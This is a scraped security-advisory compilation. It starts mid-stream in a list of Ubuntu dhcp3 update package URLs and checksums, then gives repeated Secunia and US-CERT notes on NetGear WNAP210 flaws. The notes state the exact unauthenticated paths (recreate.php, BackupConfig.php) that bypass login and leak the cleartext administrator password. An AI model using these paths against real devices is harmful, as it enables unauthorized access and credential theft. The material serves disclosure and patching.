http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-client-udeb_3.0.6.dfsg-1ubuntu9.2_lpia.udeb Size/MD5: 158248 1ce010480a0ea9a1a8683995ab5c9b68 http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-client_3.0.6.dfsg-1ubuntu9.2_lpia.deb Size/MD5: 220236 d0c1551dde51da5503fe3be6288a23bb http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-common_3.0.6.dfsg-1ubuntu9.2_lpia.deb Size/MD5: 279790 cf35fa8aaca649fd85366e684628a580 http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-dev_3.0.6.dfsg-1ubuntu9.2_lpia.deb Size/MD5: 109062 d1ff75192f05906028ac9001483529da http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-server_3.0.6.dfsg-1ubuntu9.2_lpia.deb Size/MD5: 316576 6f95deb3879a7c38c0f9cd1ba1ff0228 http://ports.ubuntu.com/pool/universe/d/dhcp3/dhcp3-relay_3.0.6.dfsg-1ubuntu9.2_lpia.deb Size/MD5: 102310 d4b1c32f8c1d1a6383fc09580e46ec79 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-client-udeb_3.0.6.dfsg-1ubuntu9.2_powerpc.udeb Size/MD5: 177278 29a10d5d08bc3797b67770a4028758ff http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-client_3.0.6.dfsg-1ubuntu9.2_powerpc.deb Size/MD5: 242046 27324a8f5623a94ff813148a5267fb4b http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-common_3.0.6.dfsg-1ubuntu9.2_powerpc.deb Size/MD5: 296498 4b8af066dc6c2481e4ff360800c04e74 http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-dev_3.0.6.dfsg-1ubuntu9.2_powerpc.deb Size/MD5: 122548 9ad8db4fbd23f1760d1bc123b01f014b http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-server_3.0.6.dfsg-1ubuntu9.2_powerpc.deb Size/MD5: 341860 28075deaecbdc1d77166dcb1623a8c85 http://ports.ubuntu.com/pool/universe/d/dhcp3/dhcp3-relay_3.0.6.dfsg-1ubuntu9.2_powerpc.deb Size/MD5: 112934 766413326d6486146da4aec03a2654bc sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-client-udeb_3.0.6.dfsg-1ubuntu9.2_sparc.udeb Size/MD5: 156574 742d54969d6dd68e7ac86ca00e1b1832 http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-client_3.0.6.dfsg-1ubuntu9.2_sparc.deb Size/MD5: 218754 60013fe472200e1bf45d9b02d80a244e http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-common_3.0.6.dfsg-1ubuntu9.2_sparc.deb Size/MD5: 277066 bf1034124c51ddacf732c2887957a46e http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-dev_3.0.6.dfsg-1ubuntu9.2_sparc.deb Size/MD5: 113494 b50639e27d92c0ababba9fab23242d7d http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-server_3.0.6.dfsg-1ubuntu9.2_sparc.deb Size/MD5: 313426 b93d5ec9d7ea9717a79d6bf2bb80a285 http://ports.ubuntu.com/pool/universe/d/dhcp3/dhcp3-relay_3.0.6.dfsg-1ubuntu9.2_sparc.deb Size/MD5: 102930 df99654fbd9e6f5aba7f962adb9d6470 Updated packages for Ubuntu 9.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3_3.1.2-1ubuntu7.2.diff.gz Size/MD5: 141611 0cab5bee752928f3c9f0c8e1ded26167 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3_3.1.2-1ubuntu7.2.dsc Size/MD5: 1955 a26905456538cd0d30e924e488302fc4 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3_3.1.2.orig.tar.gz Size/MD5: 799626 85901a9554650030df7d1ef3e5959fdf Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/d/dhcp3/dhcp-client_3.1.2-1ubuntu7.2_all.deb Size/MD5: 26206 905e286082551fcbc23916052de7e2fa amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-client-udeb_3.1.2-1ubuntu7.2_amd64.udeb Size/MD5: 208604 5bb8643607d5f416205174f97d443e8e http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-client_3.1.2-1ubuntu7.2_amd64.deb Size/MD5: 270930 fa0267775f2471f0be30499bf121b6e7 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-common_3.1.2-1ubuntu7.2_amd64.deb Size/MD5: 332152 ee101e67b7ad97bd410e983da115484d http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-dev_3.1.2-1ubuntu7.2_amd64.deb Size/MD5: 127130 0d4b4a1dc992d56f8c01d94990290910 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-server_3.1.2-1ubuntu7.2_amd64.deb Size/MD5: 395062 a5ab658903283a97dd658e5cdfe6a45e http://security.ubuntu.com/ubuntu/pool/universe/d/dhcp3/dhcp3-relay_3.1.2-1ubuntu7.2_amd64.deb Size/MD5: 125444 6f12bfb86b46567aa8e2ecba8af1852e http://security.ubuntu.com/ubuntu/pool/universe/d/dhcp3/dhcp3-server-ldap_3.1.2-1ubuntu7.2_amd64.deb Size/MD5: 348242 8fe33e4a7afac6d5a952d0c158d7ed45 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-client-udeb_3.1.2-1ubuntu7.2_i386.udeb Size/MD5: 191210 64285abd7e68c517eefcf3ff5eecb909 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-client_3.1.2-1ubuntu7.2_i386.deb Size/MD5: 252916 749769cec2a5d0cdfe5ddb67e6864270 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-common_3.1.2-1ubuntu7.2_i386.deb Size/MD5: 315850 e0deb4932a763831adc3e73cf0f068fa http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-dev_3.1.2-1ubuntu7.2_i386.deb Size/MD5: 116650 434d9e26a1b3b5a4b5fd94bea2c581b4 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-server_3.1.2-1ubuntu7.2_i386.deb Size/MD5: 372288 481d9d80e948895969b72be4b825fbb8 http://security.ubuntu.com/ubuntu/pool/universe/d/dhcp3/dhcp3-relay_3.1.2-1ubuntu7.2_i386.deb Size/MD5: 116424 49010850bef64719353588c5d88e6714 http://security.ubuntu.com/ubuntu/pool/universe/d/dhcp3/dhcp3-server-ldap_3.1.2-1ubuntu7.2_i386.deb Size/MD5: 326174 7f328cba4c811d5d56582328f1ad6b1d armel architecture (ARM Architecture): http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-client-udeb_3.1.2-1ubuntu7.2_armel.udeb Size/MD5: 174400 4ed674aa3f13c4c4012def78b6cfd62f http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-client_3.1.2-1ubuntu7.2_armel.deb Size/MD5: 236228 c14a8f75dc70e363afb2e39b9b6c9b68 http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-common_3.1.2-1ubuntu7.2_armel.deb Size/MD5: 300026 8183f7371713d8ddc8bd2b8f8d979794 http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-dev_3.1.2-1ubuntu7.2_armel.deb Size/MD5: 112806 41dcceea5abd7feac4f1f7465b3892b7 http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-server_3.1.2-1ubuntu7.2_armel.deb Size/MD5: 349366 ea2f47d49b065c252caeb33d9d273363 http://ports.ubuntu.com/pool/universe/d/dhcp3/dhcp3-relay_3.1.2-1ubuntu7.2_armel.deb Size/MD5: 108672 f277fadf0e50c5325b20f8001f30108a http://ports.ubuntu.com/pool/universe/d/dhcp3/dhcp3-server-ldap_3.1.2-1ubuntu7.2_armel.deb Size/MD5: 301210 76887fde4612e80131c94a00b328a874 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-client-udeb_3.1.2-1ubuntu7.2_lpia.udeb Size/MD5: 187330 e70af0ba0633b7a10c666f2f2e30b017 http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-client_3.1.2-1ubuntu7.2_lpia.deb Size/MD5: 249154 bde848f0444ac204f0781d848771b2e7 http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-common_3.1.2-1ubuntu7.2_lpia.deb Size/MD5: 312056 e131e50d9159fb5a7cf92bd7532c6d5b http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-dev_3.1.2-1ubuntu7.2_lpia.deb Size/MD5: 115610 6bf9bc6ccc3986f7bda77f6e0929bd2b http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-server_3.1.2-1ubuntu7.2_lpia.deb Size/MD5: 368276 a5d4ce07f31b702817fb3d3961fd8a7b http://ports.ubuntu.com/pool/universe/d/dhcp3/dhcp3-relay_3.1.2-1ubuntu7.2_lpia.deb Size/MD5: 114588 d030b6a51bf6eb1b682c88fcfc92cdda http://ports.ubuntu.com/pool/universe/d/dhcp3/dhcp3-server-ldap_3.1.2-1ubuntu7.2_lpia.deb Size/MD5: 321710 5c51aac0b4ea78167072cce854d63f47 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-client-udeb_3.1.2-1ubuntu7.2_powerpc.udeb Size/MD5: 199998 aff548b71963695089f418a502bc5e01 http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-client_3.1.2-1ubuntu7.2_powerpc.deb Size/MD5: 262344 a4799a7b4c6d6d91120ef36537485080 http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-common_3.1.2-1ubuntu7.2_powerpc.deb Size/MD5: 324014 c6be94d8dda2d47ea08c3f1277160eda http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-dev_3.1.2-1ubuntu7.2_powerpc.deb Size/MD5: 120394 4b35e8aa5a363a659daa6232a0a76501 http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-server_3.1.2-1ubuntu7.2_powerpc.deb Size/MD5: 382434 9c71333d4f8ccc12d14996fa42ba60b7 http://ports.ubuntu.com/pool/universe/d/dhcp3/dhcp3-relay_3.1.2-1ubuntu7.2_powerpc.deb Size/MD5: 120310 32c5affaeb955349a26cae2bd9c92236 http://ports.ubuntu.com/pool/universe/d/dhcp3/dhcp3-server-ldap_3.1.2-1ubuntu7.2_powerpc.deb Size/MD5: 335902 5460f8f32a30489940cf69855983ed3c sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-client-udeb_3.1.2-1ubuntu7.2_sparc.udeb Size/MD5: 203458 038c030a32c3d74e3d20cb4f8eaf5336 http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-client_3.1.2-1ubuntu7.2_sparc.deb Size/MD5: 265862 67e06c4f7f5352a3248060245f41837c http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-common_3.1.2-1ubuntu7.2_sparc.deb Size/MD5: 324634 873eeaf81f86f69e1de8f2c9c2335fda http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-dev_3.1.2-1ubuntu7.2_sparc.deb Size/MD5: 116874 4583b6c0cd5cf6abf8fc81ae1c5656a2 http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-server_3.1.2-1ubuntu7.2_sparc.deb Size/MD5: 387388 d31379a7fe21d36761ce6d6e01d51ba7 http://ports.ubuntu.com/pool/universe/d/dhcp3/dhcp3-relay_3.1.2-1ubuntu7.2_sparc.deb Size/MD5: 121616 62ed8721ad7cfe9f45448c321be12340 http://ports.ubuntu.com/pool/universe/d/dhcp3/dhcp3-server-ldap_3.1.2-1ubuntu7.2_sparc.deb Size/MD5: 341160 9e72b31fccc6ca7d33fcf814f7cca8be Updated packages for Ubuntu 10.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3_3.1.3-2ubuntu3.1.diff.gz Size/MD5: 145049 762c8d99c1e8e1245830ff0cfc9c22cf http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3_3.1.3-2ubuntu3.1.dsc Size/MD5: 1950 6fc0ed0a5f2f2897b25cb127fdf599bb http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3_3.1.3.orig.tar.gz Size/MD5: 804097 6ee8af8b283c95b3b4db5e88b6dd9a26 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/d/dhcp3/dhcp-client_3.1.3-2ubuntu3.1_all.deb Size/MD5: 27294 5873371bf57e765fd69a49ab238f7f5f amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-client-udeb_3.1.3-2ubuntu3.1_amd64.udeb Size/MD5: 208924 47388e6df5a8a88758f893f0157f7a49 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-client_3.1.3-2ubuntu3.1_amd64.deb Size/MD5: 273438 3e968127e7212b682e23422ccd498a51 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-common_3.1.3-2ubuntu3.1_amd64.deb Size/MD5: 335524 c2231ce6ce81fa1a61f33b50879ea8e7 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-dev_3.1.3-2ubuntu3.1_amd64.deb Size/MD5: 127748 31baa39d20b53e7200b146bb5e1dbc7a http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-server_3.1.3-2ubuntu3.1_amd64.deb Size/MD5: 396594 05f2652d1223dbbf59bcfdb86503ec81 http://security.ubuntu.com/ubuntu/pool/universe/d/dhcp3/dhcp3-relay_3.1.3-2ubuntu3.1_amd64.deb Size/MD5: 126830 2017ee773f9e4c4136e6604003978a72 http://security.ubuntu.com/ubuntu/pool/universe/d/dhcp3/dhcp3-server-ldap_3.1.3-2ubuntu3.1_amd64.deb Size/MD5: 349758 3a07e9f0c5b36e05024e98f2e01e7a36 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-client-udeb_3.1.3-2ubuntu3.1_i386.udeb Size/MD5: 191468 7efe2e4b59392afda8ef1c8d69aa04cd http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-client_3.1.3-2ubuntu3.1_i386.deb Size/MD5: 256600 1b24883c7ee056fcbcda20cc1d82673e http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-common_3.1.3-2ubuntu3.1_i386.deb Size/MD5: 318512 8ad3080333f5d86ad40548de9cfced43 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-dev_3.1.3-2ubuntu3.1_i386.deb Size/MD5: 118816 c679db32ae992ca9f6fc5473e81df94a http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-server_3.1.3-2ubuntu3.1_i386.deb Size/MD5: 376744 e3b708777fcd15c84240e43bf08b5d7e http://security.ubuntu.com/ubuntu/pool/universe/d/dhcp3/dhcp3-relay_3.1.3-2ubuntu3.1_i386.deb Size/MD5: 117698 b0dfb728d6d9f69c9af3910744b1fbb8 http://security.ubuntu.com/ubuntu/pool/universe/d/dhcp3/dhcp3-server-ldap_3.1.3-2ubuntu3.1_i386.deb Size/MD5: 328168 617edc965494055443d2c43326c411d7 armel architecture (ARM Architecture): http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-client-udeb_3.1.3-2ubuntu3.1_armel.udeb Size/MD5: 180926 3969ae580d52c38b45d63ac388cbbe4d http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-client_3.1.3-2ubuntu3.1_armel.deb Size/MD5: 246116 4956ee0ca5be72ee8ece1cd89ccf5082 http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-common_3.1.3-2ubuntu3.1_armel.deb Size/MD5: 309348 c8567f86659a5670b6c7167a106bf71a http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-dev_3.1.3-2ubuntu3.1_armel.deb Size/MD5: 115350 023f49615f6ca0a8f2367e816921fa8d http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-server_3.1.3-2ubuntu3.1_armel.deb Size/MD5: 361242 b8e92e0d7ee35dccf62349627513b3d5 http://ports.ubuntu.com/pool/universe/d/dhcp3/dhcp3-relay_3.1.3-2ubuntu3.1_armel.deb Size/MD5: 113136 ecc1eca1107bf3d2a85145c87800f0a9 http://ports.ubuntu.com/pool/universe/d/dhcp3/dhcp3-server-ldap_3.1.3-2ubuntu3.1_armel.deb Size/MD5: 314078 a09784b9e5545593b771e8db596b70ad powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-client-udeb_3.1.3-2ubuntu3.1_powerpc.udeb Size/MD5: 200432 0db5e288252f7cec9511aeedd6328a87 http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-client_3.1.3-2ubuntu3.1_powerpc.deb Size/MD5: 265410 78eb3d25b509d5d3669a33bf8603b0df http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-common_3.1.3-2ubuntu3.1_powerpc.deb Size/MD5: 327180 9d47f9f6bd35ebd5e53e68ff8cf27473 http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-dev_3.1.3-2ubuntu3.1_powerpc.deb Size/MD5: 121552 7d955d50534795154e471aea30341fe1 http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-server_3.1.3-2ubuntu3.1_powerpc.deb Size/MD5: 385370 dd7f5ffd85a725a8cb4f8fe6a067d0bb http://ports.ubuntu.com/pool/universe/d/dhcp3/dhcp3-relay_3.1.3-2ubuntu3.1_powerpc.deb Size/MD5: 121446 0ccdd1ca74fcd96be84596ce324f967e http://ports.ubuntu.com/pool/universe/d/dhcp3/dhcp3-server-ldap_3.1.3-2ubuntu3.1_powerpc.deb Size/MD5: 337410 54549752057dc73a3e35a158b871ea36 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-client-udeb_3.1.3-2ubuntu3.1_sparc.udeb Size/MD5: 212712 be3c531c2fffd6ad83501e44015a3532 http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-client_3.1.3-2ubuntu3.1_sparc.deb Size/MD5: 277974 5a9ee5790cc705c845cd085c71d001b5 http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-common_3.1.3-2ubuntu3.1_sparc.deb Size/MD5: 335174 22b404e90f206772c786f968392ecef1 http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-dev_3.1.3-2ubuntu3.1_sparc.deb Size/MD5: 121764 97643d01dd5dd3eb06859cb881312e6d http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-server_3.1.3-2ubuntu3.1_sparc.deb Size/MD5: 402564 889e3a0882bebb5b4ceb4df3c805d883 http://ports.ubuntu.com/pool/universe/d/dhcp3/dhcp3-relay_3.1.3-2ubuntu3.1_sparc.deb Size/MD5: 126888 546ab5281e2ba4672471a30fce814e36 http://ports.ubuntu.com/pool/universe/d/dhcp3/dhcp3-server-ldap_3.1.3-2ubuntu3.1_sparc.deb Size/MD5: 353712 64fcbf89ca8fd7af9aa2a9bd66739170 Updated packages for Ubuntu 10.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3_3.1.3-2ubuntu6.1.diff.gz Size/MD5: 151417 604106743c8429a59b9b8af55de854f7 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3_3.1.3-2ubuntu6.1.dsc Size/MD5: 1962 792f947b2a6c3020c45ca1b56771c77e http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3_3.1.3.orig.tar.gz Size/MD5: 804097 6ee8af8b283c95b3b4db5e88b6dd9a26 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/d/dhcp3/dhcp-client_3.1.3-2ubuntu6.1_all.deb Size/MD5: 27778 319b0ce429e455b13a2248cc2cbe3491 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-client-udeb_3.1.3-2ubuntu6.1_amd64.udeb Size/MD5: 208588 f4d4d2a63016b2b9960654be7c04b9c5 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-client_3.1.3-2ubuntu6.1_amd64.deb Size/MD5: 274192 4005626ae7c8ed06bf15a1e014968ebd http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-common_3.1.3-2ubuntu6.1_amd64.deb Size/MD5: 335392 3f745248ea2b2c54e1771f1789cd13dc http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-dev_3.1.3-2ubuntu6.1_amd64.deb Size/MD5: 128922 dc2dd29ead86d887a22da63f27ae9692 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-server_3.1.3-2ubuntu6.1_amd64.deb Size/MD5: 398270 ffd780e99cb19cc3884703ec930a68cb http://security.ubuntu.com/ubuntu/pool/universe/d/dhcp3/dhcp3-relay_3.1.3-2ubuntu6.1_amd64.deb Size/MD5: 126752 a4d3f03e0855ce6ef4cf6a75f33198d1 http://security.ubuntu.com/ubuntu/pool/universe/d/dhcp3/dhcp3-server-ldap_3.1.3-2ubuntu6.1_amd64.deb Size/MD5: 349942 430e5e501488da92c3b4e2f2a685912a i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-client-udeb_3.1.3-2ubuntu6.1_i386.udeb Size/MD5: 190312 23ced3137d0e056d9ce13dd41e656af3 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-client_3.1.3-2ubuntu6.1_i386.deb Size/MD5: 255768 07cfc1c5db7b6d8585e9a00513699049 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-common_3.1.3-2ubuntu6.1_i386.deb Size/MD5: 317854 f9a58ae40c5f2645e17e2a9349f07edf http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-dev_3.1.3-2ubuntu6.1_i386.deb Size/MD5: 119094 9af94d26ecd3ce03c9d059ab8db5ff46 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-server_3.1.3-2ubuntu6.1_i386.deb Size/MD5: 376052 2dd5ab42f28d13baab1d332c92fcdbcf http://security.ubuntu.com/ubuntu/pool/universe/d/dhcp3/dhcp3-relay_3.1.3-2ubuntu6.1_i386.deb Size/MD5: 117472 9638997daef5f353621a3adea0f054d5 http://security.ubuntu.com/ubuntu/pool/universe/d/dhcp3/dhcp3-server-ldap_3.1.3-2ubuntu6.1_i386.deb Size/MD5: 327368 93d8a202391be7d55484901a7fa00f09 armel architecture (ARM Architecture): http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-client-udeb_3.1.3-2ubuntu6.1_armel.udeb Size/MD5: 191162 ea1961dc40672d12302dcb3e0ae62c44 http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-client_3.1.3-2ubuntu6.1_armel.deb Size/MD5: 256344 fd6d84d8ca333a1e0cc0efc4c26df7cb http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-common_3.1.3-2ubuntu6.1_armel.deb Size/MD5: 319110 4ed5fb07ce8a4997c1132f96e4c29e39 http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-dev_3.1.3-2ubuntu6.1_armel.deb Size/MD5: 118586 ade0a8cfa1217ae39ff58bea47e4faa0 http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-server_3.1.3-2ubuntu6.1_armel.deb Size/MD5: 377976 7f26e7b4442f8b17b8178fc7b44e6720 http://ports.ubuntu.com/pool/universe/d/dhcp3/dhcp3-relay_3.1.3-2ubuntu6.1_armel.deb Size/MD5: 118802 ee96894319dbf620dbf981a2493cefa0 http://ports.ubuntu.com/pool/universe/d/dhcp3/dhcp3-server-ldap_3.1.3-2ubuntu6.1_armel.deb Size/MD5: 328204 3a65c3fb55385716b19bbb6fce72ab07 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-client-udeb_3.1.3-2ubuntu6.1_powerpc.udeb Size/MD5: 199526 1a984e2503c1a015134cf94e273b768a http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-client_3.1.3-2ubuntu6.1_powerpc.deb Size/MD5: 264952 7a2139af6f6681dae88cd826c04ce61e http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-common_3.1.3-2ubuntu6.1_powerpc.deb Size/MD5: 326646 8a1aaf899283814de8b8bcca6125576d http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-dev_3.1.3-2ubuntu6.1_powerpc.deb Size/MD5: 121952 90719742a1e133ae5edb9c5d6e72ad06 http://ports.ubuntu.com/pool/main/d/dhcp3/dhcp3-server_3.1.3-2ubuntu6.1_powerpc.deb Size/MD5: 384922 1cb9a8d40d9405b061b28cd2236d3acd http://ports.ubuntu.com/pool/universe/d/dhcp3/dhcp3-relay_3.1.3-2ubuntu6.1_powerpc.deb Size/MD5: 121542 81b420f37a81e5a05e5aadeaf1cb47c3 http://ports.ubuntu.com/pool/universe/d/dhcp3/dhcp3-server-ldap_3.1.3-2ubuntu6.1_powerpc.deb Size/MD5: 336918 26cba2f6096556526ce2a64556f571e5

The NetGear ProSafe WNAP210 with firmware 2.0.12 allows remote attackers to bypass authentication and obtain access to the configuration page by visiting recreate.php and then visiting index.php. NetGear WNAP210 is vulnerable to remote administrator password disclosure and administrative web page login bypass. Netgear ProSafe Wireless Access Point (WNAP210) Has multiple vulnerabilities. Netgear Provided by WNAP210 Has two vulnerabilities. This configuration stores the administrator password in clear text. NETGEAR WNAP210 has a security bypass vulnerability in its implementation. WNAP210 firmware 2.0.12 is vulnerable; other versions may also be affected. ---------------------------------------------------------------------- Q1 Factsheets released: http://secunia.com/resources/factsheets/2011_vendor/ ---------------------------------------------------------------------- TITLE: NetGear WNAP210 Backup Disclosure and Authentication Bypass Vulnerabilities SECUNIA ADVISORY ID: SA44045 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/44045/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=44045 RELEASE DATE: 2011-04-06 DISCUSS ADVISORY: http://secunia.com/advisories/44045/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/44045/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=44045 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Two vulnerabilities have been reported in Netgear ProSafe Wireless-N Access Point WNAP210, which can be exploited by malicious people to disclose sensitive information and bypass certain security restrictions. SOLUTION: Update to the latest firmware. Please contact the vendor for more details. PROVIDED AND/OR DISCOVERED BY: Trevor Seward via US-CERT. ORIGINAL ADVISORY: US-CERT VU#644812: http://www.kb.cert.org/vuls/id/644812 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

BackupConfig.php on the NetGear ProSafe WNAP210 allows remote attackers to obtain the administrator password by reading the configuration file. Netgear ProSafe Wireless Access Point (WNAP210) Has multiple vulnerabilities. Netgear Provided by WNAP210 Has two vulnerabilities. An attacker with a network access device can browse the WEB page http://NetGearDeviceIP/BackupConfig.php, which will prompt the attacker to download the device configuration without any login authentication. Access to the BackupConfig.php script is not properly restricted and can be used to download configuration files for backup and leak administrator passwords. WNAP210 firmware 2.0.12 is vulnerable; other versions may also be affected. ---------------------------------------------------------------------- Q1 Factsheets released: http://secunia.com/resources/factsheets/2011_vendor/ ---------------------------------------------------------------------- TITLE: NetGear WNAP210 Backup Disclosure and Authentication Bypass Vulnerabilities SECUNIA ADVISORY ID: SA44045 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/44045/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=44045 RELEASE DATE: 2011-04-06 DISCUSS ADVISORY: 